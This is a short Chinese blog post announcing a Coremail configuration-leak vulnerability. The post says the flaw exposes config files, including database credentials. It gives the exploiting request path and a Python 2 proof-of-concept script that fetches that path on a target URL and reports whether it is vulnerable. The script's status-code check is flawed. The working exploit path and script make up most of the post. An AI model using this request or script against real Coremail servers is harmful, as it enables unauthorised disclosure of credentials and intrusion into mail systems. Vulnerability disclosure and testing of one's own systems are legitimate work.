Coremail配置信息泄露漏洞

  • 内容
  • 相关

hw行动爆出来的~

该漏洞可造成coremail的配置文件信息泄露,其中包括数据库连接的用户名密码等敏感信息。

测试:mailsms/s?func=ADMIN:appState&dumpConfig=/

Image

poc:

import requests,sys

def mailsmsPoC(url):
    url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
    r = requests.get(url)
    if (r.status_code != '404') and ("/home/coremail" in r.text):
        print "mailsms is vulnerable: {0}".format(url)
    else:
        print "mailsms is safe!"

if __name__ == '__main__':
    try:
        mailsmsPoC(sys.argv[1])
    except:
        print "usage: python poc.py http://hi-ourlife.com/"

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:Coremail配置信息泄露漏洞 - http://www.shungg.cn/post/235

发表评论

电子邮件地址不会被公开。 必填项已用*标注